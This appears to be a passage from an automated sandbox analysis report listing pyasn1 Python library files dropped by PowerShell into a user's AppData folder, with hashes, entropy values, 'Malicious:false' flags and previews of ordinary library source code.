                                                                                                                                                                                                  MD5:5363E4199D27FC3C88036B72AEA5913E
                                                                                                                                                                                                  SHA1:9A2853D0DFACE693CD0F3612A66A2BCBA27C60F9
                                                                                                                                                                                                  SHA-256:569F950E1D12940E61ED3D77DEB9DEF54365265AAFDA88695335654821A3AB6E
                                                                                                                                                                                                  SHA-512:134D6F8B92CD13B8333C2B7B38A35C1A68D593CC17F5F604A4F26F125BB663020AC43A193C94AF6BF8224EEDA65CF0C49E29613151847AD392191FDA713BF8DF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#.# This file is part of pyasn1 software..#.# Copyright (c) 2005-2019, Ilya Etingof <etingof@gmail.com>.# License: https://pyasn1.readthedocs.io/en/latest/license.html.#.import io.import os..from pyasn1 import error.from pyasn1.type import univ..class CachingStreamWrapper(io.IOBase):. """Wrapper around non-seekable streams... Note that the implementation is tied to the decoder,. not checking for dangerous arguments for the sake. of performance... The read bytes are kept in an internal cache until. setting _markedPosition which may reset the cache.. """. def __init__(self, raw):. self._raw = raw. self._cache = io.BytesIO(). self._markedPosition = 0.. def peek(self, n):. result = self.read(n). self._cache.seek(-len(result), os.SEEK_CUR). return result.. def seekable(self):. return True.. def seek(self, n=-1, whence=os.SEEK_SET):. # Note that this not safe for seeking forward.. return self._cac

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pyasn1\compat\__init__.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):112
                                                                                                                                                                                                  Entropy (8bit):4.589322418263753
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:SbFQmxAG65kQWIXtH0EEvaWAzaZF+EAliD8xP:SbFd65kDSH9E1AGZF+WEP
                                                                                                                                                                                                  MD5:C107218355DDCBDF4D134A758984E77B
                                                                                                                                                                                                  SHA1:2C22BD161F77193E3FEBE5289AFEFF01DE8A6C23
                                                                                                                                                                                                  SHA-256:FBD14E255D524C505AB5FDA955188E627D781A608A0BC458DD3602C4EA9F4576
                                                                                                                                                                                                  SHA-512:31745C8F94D681AD662FD936BE3AF507FB017DA9A95059EC7710BB1617E9247499ADA2C51264544B96B9AB9D1EDCF536EAD478032FEF8EB427274D7E37C3441E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# This file is necessary to make this directory a package...# sentinal for missing argument._MISSING = object().

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pyasn1\compat\integer.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):404
                                                                                                                                                                                                  Entropy (8bit):4.863740311425124
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:LfSFWJOwzz6aMsLGMOw2QC+FJ2+dPJtC4UAgy0BqLzyKkk40mFtkYqNyHFKFOA//:L6FLCXLGnw2QC+5JJYk4xkYqgHFHlB4x
                                                                                                                                                                                                  MD5:C63C65D95ECEB19ECE44C53EAE5CADAC
                                                                                                                                                                                                  SHA1:FE3673B212C2F9DCF7C9662F8B435F6D6729759E
                                                                                                                                                                                                  SHA-256:94C5EA6C9053CA3837E11871E89945717CA84310DA7971B185A20869BF3A857F
                                                                                                                                                                                                  SHA-512:401C6D51AA1C7B513875F3C7F797E7FA61FB712942650BD3FEAA65F7BAF336F81EC019549F9E8C0AF28BCF7E3EE89A809235CC0AB4A0D2488C66A26F24D3FD4E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#.# This file is part of pyasn1 software..#.# Copyright (c) 2005-2020, Ilya Etingof <etingof@gmail.com>.# License: https://pyasn1.readthedocs.io/en/latest/license.html.#.def to_bytes(value, signed=False, length=0):. length = max(value.bit_length(), length).. if signed and length % 8 == 0:. length += 1.. return value.to_bytes(length // 8 + (length % 8 and 1 or 0), 'big', signed=signed).

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pyasn1\debug.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3494
                                                                                                                                                                                                  Entropy (8bit):4.713866414481561
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:lByCKcN9qTb2LyEju3fHX/sAwqw/bZFoWRHN81g:lBp1CKHu3fEH9FoWRHNeg
                                                                                                                                                                                                  MD5:724EA461ABF7C21AF0DD11AD7FE25430
                                                                                                                                                                                                  SHA1:A5962B946A6DCBA29DEC99CD3E3452AC6BCC5639
                                                                                                                                                                                                  SHA-256:BBE5A62057DEC2AA74D38D5ECEFB538EF859714F4AD78388EA9D3402B5D9EB78
                                                                                                                                                                                                  SHA-512:312EF72A23972C3C38D47C9A968F8B71E17D5C4269FD430C5893857D8578B1FC60E7159622BC1DCA8144675E2BD530806220A609A963567EA6AAC994843ECD3E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#.# This file is part of pyasn1 software..#.# Copyright (c) 2005-2020, Ilya Etingof <etingof@gmail.com>.# License: https://pyasn1.readthedocs.io/en/latest/license.html.#.import logging.import sys..from pyasn1 import __version__.from pyasn1 import error..__all__ = ['Debug', 'setLogger', 'hexdump']..DEBUG_NONE = 0x0000.DEBUG_ENCODER = 0x0001.DEBUG_DECODER = 0x0002.DEBUG_ALL = 0xffff..FLAG_MAP = {. 'none': DEBUG_NONE,. 'encoder': DEBUG_ENCODER,. 'decoder': DEBUG_DECODER,. 'all': DEBUG_ALL.}..LOGGEE_MAP = {}...class Printer(object):. # noinspection PyShadowingNames. def __init__(self, logger=None, handler=None, formatter=None):. if logger is None:. logger = logging.getLogger('pyasn1').. logger.setLevel(logging.DEBUG).. if handler is None:. handler = logging.StreamHandler().. if formatter is None:. formatter = logging.Formatter('%(asctime)s %(name)s: %(message)s').. handler.setFormatter(formatter).

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pyasn1\error.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3258
                                                                                                                                                                                                  Entropy (8bit):4.668856659750884
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:lQV9bsjqXBMXED78OrPm0WXM9NJKrbjb2b:loZ5GJOrPmTrbjb2b
                                                                                                                                                                                                  MD5:D3A47C50429385B9BB53632A313F87CC
                                                                                                                                                                                                  SHA1:F4F7A0583AF36D2BBB913C968E36325C4E7A2EF5
                                                                                                                                                                                                  SHA-256:7B7E76A2A5B7DEC79E87631B205DBBB054A0A627A08ECB5A6C2305C76A624743
                                                                                                                                                                                                  SHA-512:2C6233CEB9F4DAA912DA96FAF4C225F493D0E775CE42B10B2DED76BA9447DB480BA20D7E2F3EBAD13069FD465C3129AA690825E988AB93F3BB2EDD43514D2D4D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#.# This file is part of pyasn1 software..#.# Copyright (c) 2005-2020, Ilya Etingof <etingof@gmail.com>.# License: https://pyasn1.readthedocs.io/en/latest/license.html.#...class PyAsn1Error(Exception):. """Base pyasn1 exception.. `PyAsn1Error` is the base exception class (based on. :class:`Exception`) that represents all possible ASN.1 related. errors... Parameters. ----------. args:. Opaque positional parameters.. Keyword Args. ------------. kwargs:. Opaque keyword parameters.. """. def __init__(self, *args, **kwargs):. self._args = args. self._kwargs = kwargs.. @property. def context(self):. """Return exception context.. When exception object is created, the caller can supply some opaque. context for the upper layers to better understand the cause of the. exception... Returns. -------. : :py:class:`dict`. Dict holding context specific data. """.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pyasn1\type\__init__.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):59
                                                                                                                                                                                                  Entropy (8bit):4.089038983548258
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:SbFQmxAG65kQWIXtH0EEvn:SbFd65kDSH9Ev
                                                                                                                                                                                                  MD5:0FC1B4D3E705F5C110975B1B90D43670
                                                                                                                                                                                                  SHA1:14A9B683B19E8D7D9CB25262CDEFCB72109B5569
                                                                                                                                                                                                  SHA-256:1040E52584B5EF6107DFD19489D37FF056E435C598F4E555F1EDF4015E7CA67D
                                                                                                                                                                                                  SHA-512:8A147C06C8B0A960C9A3FA6DA3B30A3B18D3612AF9C663EE24C8D2066F45419A2FF4AA3A636606232ECA12D7FAEF3DA0CBBD3670A2D72A3281544E1C0B8EDF81
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# This file is necessary to make this directory a package..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pyasn1\type\base.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):22050
                                                                                                                                                                                                  Entropy (8bit):4.579010774885626
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:lDyhIpn3s294cik9Y5W0I55r7fhv6JVIMS8uIyspBO8w+LXp5zZNwChlI1mFQj75:lDkIzr71MIMVXy+TJZNE1mFQj7gC3
                                                                                                                                                                                                  MD5:4082019424A93267006F5666E37B4AD8
                                                                                                                                                                                                  SHA1:3CE5B4D5769474E84E35AD6E3F63FBEF40011106
                                                                                                                                                                                                  SHA-256:B63051BD72104A21C44B9F9EE6B05BB279F90AD22F0600AE7E5BA30DB76BB643
                                                                                                                                                                                                  SHA-512:02E0666193F1292D3BC28F55405150E1E5383532D6B54703D199DAFBD8AAF791FE0B66D63D9FB8699CD0B4CEC4FACE4D9DD433B2EF4D1A3D02E3F5E2A39BFA6B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#.# This file is part of pyasn1 software..#.# Copyright (c) 2005-2020, Ilya Etingof <etingof@gmail.com>.# License: https://pyasn1.readthedocs.io/en/latest/license.html.#.import sys..from pyasn1 import error.from pyasn1.type import constraint.from pyasn1.type import tag.from pyasn1.type import tagmap..__all__ = ['Asn1Item', 'Asn1Type', 'SimpleAsn1Type',. 'ConstructedAsn1Type']...class Asn1Item(object):. @classmethod. def getTypeId(cls, increment=1):. try:. Asn1Item._typeCounter += increment. except AttributeError:. Asn1Item._typeCounter = increment. return Asn1Item._typeCounter...class Asn1Type(Asn1Item):. """Base class for all classes representing ASN.1 types... In the user code, |ASN.1| class is normally used only for telling. ASN.1 objects from others... Note. ----. For as long as ASN.1 is concerned, a way to compare ASN.1 types. is to use :meth:`isSameTypeWith` and :meth:`isSuperTypeOf` methods.. """.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pyasn1\type\char.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9438
                                                                                                                                                                                                  Entropy (8bit):4.797282625396703
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:lDGvNLdbY31sUQblFm1dSGaW1ngswyKuyIr61S17jUYmM5bBsQLj:lDG7bQ1s9bn3GaogswyKHQ77Z
                                                                                                                                                                                                  MD5:CD13C26C1F2D8BC002646AC5B328146C
                                                                                                                                                                                                  SHA1:5862FCC6F716D5E7614BBCDD356361A2BD924C02
                                                                                                                                                                                                  SHA-256:46F8F9CA940B3CD5DC74791F515F27BA5D575FAE91FC0927D20D875322E3D6A6
                                                                                                                                                                                                  SHA-512:12DF172E52A9A713363CDBD638AF03F716DB950B311873B0DA3E7399789E8F10F6B60800035DCC83B16D9C7A113D17162518FFA029D5EEF4B28B9EE16C1DE114
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#.# This file is part of pyasn1 software..#.# Copyright (c) 2005-2020, Ilya Etingof <etingof@gmail.com>.# License: https://pyasn1.readthedocs.io/en/latest/license.html.#.import sys..from pyasn1 import error.from pyasn1.type import tag.from pyasn1.type import univ..__all__ = ['NumericString', 'PrintableString', 'TeletexString', 'T61String', 'VideotexString',. 'IA5String', 'GraphicString', 'VisibleString', 'ISO646String',. 'GeneralString', 'UniversalString', 'BMPString', 'UTF8String']..NoValue = univ.NoValue.noValue = univ.noValue...class AbstractCharacterString(univ.OctetString):. """Creates |ASN.1| schema or value object... |ASN.1| class is based on :class:`~pyasn1.type.base.SimpleAsn1Type`,. its objects are immutable and duck-type :class:`bytes`.. When used in octet-stream context, |ASN.1| type assumes. "|encoding|" encoding... Keyword Args. ------------. value: :class:`str`, :class:`bytes` or |ASN.1| object. :class:`str`, alternative

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pyasn1\type\constraint.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21915
                                                                                                                                                                                                  Entropy (8bit):4.55847274170606
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:lVXPqRQC5/EsaTiyOseVCTUV2KofnORtAlrLz3XeWpna+Mf:TyRV4GyO3VmxfnORtmHeWtXMf
                                                                                                                                                                                                  MD5:644D5608A18F08E4746232C7E428688A
                                                                                                                                                                                                  SHA1:5B3523A4E02B5CECE6F113FB7E81BEA694D1205A
                                                                                                                                                                                                  SHA-256:8E6AEDE5EB0B6B4F795DD7D2D1B7AA6A846E5239EE1E24CA7644DD09C2B1D452
                                                                                                                                                                                                  SHA-512:082778A5265207C015CDC52906CB2E355B915EED8F0DACED7926F22DDE9A005895B03CD3A66662F7DBD1979F7C259785D062F2472BD32A33C6A22FAD9C4AAAC9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#.# This file is part of pyasn1 software..#.# Copyright (c) 2005-2020, Ilya Etingof <etingof@gmail.com>.# License: https://pyasn1.readthedocs.io/en/latest/license.html.#.# Original concept and code by Mike C. Fletcher..#.import sys..from pyasn1.type import error..__all__ = ['SingleValueConstraint', 'ContainedSubtypeConstraint',. 'ValueRangeConstraint', 'ValueSizeConstraint',. 'PermittedAlphabetConstraint', 'InnerTypeConstraint',. 'ConstraintsExclusion', 'ConstraintsIntersection',. 'ConstraintsUnion']...class AbstractConstraint(object):.. def __init__(self, *values):. self._valueMap = set(). self._setValues(values). self.__hash = hash((self.__class__.__name__, self._values)).. def __call__(self, value, idx=None):. if not self._values:. return.. try:. self._testValue(value, idx).. except error.ValueConstraintError as exc:. raise error.ValueConstraintError(.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pyasn1\type\error.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):259
                                                                                                                                                                                                  Entropy (8bit):4.875261077333632
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:LfSFWJOwzz6aMsLGMOw2QC+FJ2AYD+rvDpxb/:L6FLCXLGnw2QC+CD+7Dj/
                                                                                                                                                                                                  MD5:7446DA0F0638BAD748443CBF292F52B5
                                                                                                                                                                                                  SHA1:92441A657B775AF894D554742E23AADD8F570FE7
                                                                                                                                                                                                  SHA-256:DA4C186246DDDA35C8544139E9384B46604438665F69FC288043A8FBD455FC66
                                                                                                                                                                                                  SHA-512:42FC6567B5F7E1B9B6C7B24BAED3CD8291675D87620EDBAE96658A91F9D182E4759B1F00BC5E2F763B84F904F77531E9F0396C1D1D0B58BD7B047D42D1290A9B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#.# This file is part of pyasn1 software..#.# Copyright (c) 2005-2020, Ilya Etingof <etingof@gmail.com>.# License: https://pyasn1.readthedocs.io/en/latest/license.html.#.from pyasn1.error import PyAsn1Error...class ValueConstraintError(PyAsn1Error):. pass.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pyasn1\type\namedtype.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16179
                                                                                                                                                                                                  Entropy (8bit):4.520408385405405
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:lDHPkVGLyP4e4Cz3aY9Jj5Pvj9hcX4x25Btbk4b8W8EbwAxF6ZjsqEbw10wTH1T3:lDHMQLywDCJn4XNAA8njQ8PHdAG
                                                                                                                                                                                                  MD5:2358070C48A3EBB3C7F7E32E242549B5
                                                                                                                                                                                                  SHA1:2D6F703EF5784373F26654355C76A8A8ACC1B0B1
                                                                                                                                                                                                  SHA-256:8E74C29485284598B4DB919363D1A5325308FA3E5DA8472FFE297367B8B48544
                                                                                                                                                                                                  SHA-512:4E96198D92A2E9DE96A014EEE61DF2FF9A8FDDC346AEF2369176F8D824F066FA701FC7254DF8C9F71683FA1F41139DD7D05AC1C3590F71FB076916670966288B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#.# This file is part of pyasn1 software..#.# Copyright (c) 2005-2020, Ilya Etingof <etingof@gmail.com>.# License: https://pyasn1.readthedocs.io/en/latest/license.html.#.import sys..from pyasn1 import error.from pyasn1.type import tag.from pyasn1.type import tagmap..__all__ = ['NamedType', 'OptionalNamedType', 'DefaultedNamedType',. 'NamedTypes']..class NamedType(object):. """Create named field object for a constructed ASN.1 type... The |NamedType| object represents a single name and ASN.1 type of a constructed ASN.1 type... |NamedType| objects are immutable and duck-type Python :class:`tuple` objects. holding *name* and *asn1Object* components... Parameters. ----------. name: :py:class:`str`. Field name.. asn1Object:. ASN.1 type object. """. isOptional = False. isDefaulted = False.. def __init__(self, name, asn1Object, openType=None):. self.__name = name. self.__type = asn1Object. self.__nameAndType = nam

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pyasn1\type\namedval.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4899
                                                                                                                                                                                                  Entropy (8bit):4.441749695813934
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:llGns+GAwQvrrZqqbQ4NrX/poVAZh6QS5aQPO:llcs+GAwQTroqbQ2doVMh6QjT
                                                                                                                                                                                                  MD5:8671818FADC282E395211657BEB87644
                                                                                                                                                                                                  SHA1:761601785B22C7F71E5F275E49761558BF1A5A9D
                                                                                                                                                                                                  SHA-256:F38BBAC0A39FB5EED4E3B696AC5A88651337B4EDABCA2BE9B01A956E53DECEE7
                                                                                                                                                                                                  SHA-512:9178151C2FB4B43427AE4FB4B119DD917687B66F31BA609A5CC807E5DC4E4FAA4EC547C9BE459548187767E072625375D81C56D23A73E1B5014A401646ECC1D4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#.# This file is part of pyasn1 software..#.# Copyright (c) 2005-2020, Ilya Etingof <etingof@gmail.com>.# License: https://pyasn1.readthedocs.io/en/latest/license.html.#.# ASN.1 named integers.#.from pyasn1 import error..__all__ = ['NamedValues']...class NamedValues(object):. """Create named values object... The |NamedValues| object represents a collection of string names. associated with numeric IDs. These objects are used for giving. names to otherwise numerical values... |NamedValues| objects are immutable and duck-type Python. :class:`dict` object mapping ID to name and vice-versa... Parameters. ----------. *args: variable number of two-element :py:class:`tuple`.. name: :py:class:`str`. Value label.. value: :py:class:`int`. Numeric value.. Keyword Args. ------------. name: :py:class:`str`. Value label.. value: :py:class:`int`. Numeric value.. Examples. --------.. .. code-block:: pycon.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pyasn1\type\opentype.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2861
                                                                                                                                                                                                  Entropy (8bit):4.666610948938839
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:vO+vVjpoW1+wkMsDuPsqoBKZVfg+wEkGJcKU3G3krM5cbyxVW80cbyxhW99OuKtU:ltjpoW1cMsDjqoIZVYMkG5YG0r7byxQS
                                                                                                                                                                                                  MD5:E61E177F19931B878EA736FBA633F794
                                                                                                                                                                                                  SHA1:DB25ECE6D48DF6B4CB2CED32E91AD0E7DACAA651
                                                                                                                                                                                                  SHA-256:8E3A926D3800682C6548749FEBA61C2DBAF1B5F87FF7C9C0C76BFCC335B7E4C5
                                                                                                                                                                                                  SHA-512:A33267301494CA85FA4E3F65E0FB26CDC52E9139AAF7E357356D14A82FD3C844277EE5F7989E97554D570B2AA47C33FF2D98D469B53CF35A71711C7DFDB8687C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#.# This file is part of pyasn1 software..#.# Copyright (c) 2005-2020, Ilya Etingof <etingof@gmail.com>.# License: https://pyasn1.readthedocs.io/en/latest/license.html.#..__all__ = ['OpenType']...class OpenType(object):. """Create ASN.1 type map indexed by a value.. The *OpenType* object models an untyped field of a constructed ASN.1. type. In ASN.1 syntax it is usually represented by the. `ANY DEFINED BY` for scalars or `SET OF ANY DEFINED BY`,. `SEQUENCE OF ANY DEFINED BY` for container types clauses. Typically. used together with :class:`~pyasn1.type.univ.Any` object... OpenType objects duck-type a read-only Python :class:`dict` objects,. however the passed `typeMap` is not copied, but stored by reference.. That means the user can manipulate `typeMap` at run time having this. reflected on *OpenType* object behavior... The |OpenType| class models an untyped field of a constructed ASN.1. type. In ASN.1 syntax it is usually represented by the. `AN

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pyasn1\type\tag.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9497
                                                                                                                                                                                                  Entropy (8bit):4.580140403550722
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:l8SXSGeNmVwIVvedn+rxcCDTPDwwoHrQ+304dkNwKN1eNiNZgomMfRa4xPf:l8USdcnVv5TDTrTcy/NwKN1NTm2Rrf
                                                                                                                                                                                                  MD5:0394E63E68CE2CAAA6172E1BC09174D6
                                                                                                                                                                                                  SHA1:AD3B68DF9BA4B78269A64AD7FAF40BFF478F4ABD
                                                                                                                                                                                                  SHA-256:86A22EB29521739430375F362DE40C736DD6FEF14D4E0012BE7514497E123C73
                                                                                                                                                                                                  SHA-512:AAF156DCFC67E5C69C423820B55E3DDD07157FB3C09029395F531C9EF8A60624CA7F74FD3BE83850FD52309396D680448D7A5B4D9A3351944AC7B92DDA71BB19
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#.# This file is part of pyasn1 software..#.# Copyright (c) 2005-2020, Ilya Etingof <etingof@gmail.com>.# License: https://pyasn1.readthedocs.io/en/latest/license.html.#.from pyasn1 import error..__all__ = ['tagClassUniversal', 'tagClassApplication', 'tagClassContext',. 'tagClassPrivate', 'tagFormatSimple', 'tagFormatConstructed',. 'tagCategoryImplicit', 'tagCategoryExplicit',. 'tagCategoryUntagged', 'Tag', 'TagSet']..#: Identifier for ASN.1 class UNIVERSAL.tagClassUniversal = 0x00..#: Identifier for ASN.1 class APPLICATION.tagClassApplication = 0x40..#: Identifier for ASN.1 class context-specific.tagClassContext = 0x80..#: Identifier for ASN.1 class private.tagClassPrivate = 0xC0..#: Identifier for "simple" ASN.1 structure (e.g. scalar).tagFormatSimple = 0x00..#: Identifier for "constructed" ASN.1 structure (e.g. may have inner components).tagFormatConstructed = 0x20..tagCategoryImplicit = 0x01.tagCategoryExplicit = 0x02.tagCategoryUntagged = 0x04...class

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pyasn1\type\tagmap.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3000
                                                                                                                                                                                                  Entropy (8bit):4.5830719416660335
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:vO+cMC/KIO00QLMmp6B8GnMRIHoE+hjmQLcjgFZm6jD0Uz:lhP0oB8GneIIvhmQ2gD/Vz
                                                                                                                                                                                                  MD5:587BFBFAAF894ACD62F3E0BCC65BA960
                                                                                                                                                                                                  SHA1:5D91F22ED1CD502965153378802F94965AC15936
                                                                                                                                                                                                  SHA-256:6A527D65F0C64C0B0F7B28074FAC8E3536A05240A39608A3F36617A4F690FFEF
                                                                                                                                                                                                  SHA-512:2F63695880F3F895A38AEA11A21BBBE907E4A83486B5FEB499AF95D25F7976C9E253FD92234E6C417A8FED7E9388C9C799847F32F8CD5C59974062BCBA9183D7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#.# This file is part of pyasn1 software..#.# Copyright (c) 2005-2020, Ilya Etingof <etingof@gmail.com>.# License: https://pyasn1.readthedocs.io/en/latest/license.html.#.from pyasn1 import error..__all__ = ['TagMap']...class TagMap(object):. """Map *TagSet* objects to ASN.1 types.. Create an object mapping *TagSet* object to ASN.1 type... *TagMap* objects are immutable and duck-type read-only Python. :class:`dict` objects holding *TagSet* objects as keys and ASN.1. type objects as values... Parameters. ----------. presentTypes: :py:class:`dict`. Map of :class:`~pyasn1.type.tag.TagSet` to ASN.1 objects considered. as being unconditionally present in the *TagMap*... skipTypes: :py:class:`dict`. A collection of :class:`~pyasn1.type.tag.TagSet` objects considered. as absent in the *TagMap* even when *defaultType* is present... defaultType: ASN.1 type object. An ASN.1 type object callee *TagMap* returns for any *TagSet* key no

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pyasn1\type\univ.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):109212
                                                                                                                                                                                                  Entropy (8bit):4.559454973892344
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:0palpev97k14M552Q/CdKLsheAYN91q5/DlCyIMlCyUk0:0pg552Q/CdKLsheAYNC/RCLwCjk0
                                                                                                                                                                                                  MD5:641899262B2840210B758764251F3D78
                                                                                                                                                                                                  SHA1:2862A1AFCC02D5EA4DE6C63E7845DE5CB01B8A67
                                                                                                                                                                                                  SHA-256:067BB6807740F3851730BB606F82D76C72394D8C3E90A96396C27B76427C29F2
                                                                                                                                                                                                  SHA-512:EEDC344E781AF3CF946515AD315489AC09D5B0CE9897A92928DD4F4BDBEB63AAF6D9130461E5BA5C1A7FBEA2AC866A0403874FB5668E9772B38B3DE6DD3CF427
                                                                                                                                                                                                  Malicious:false
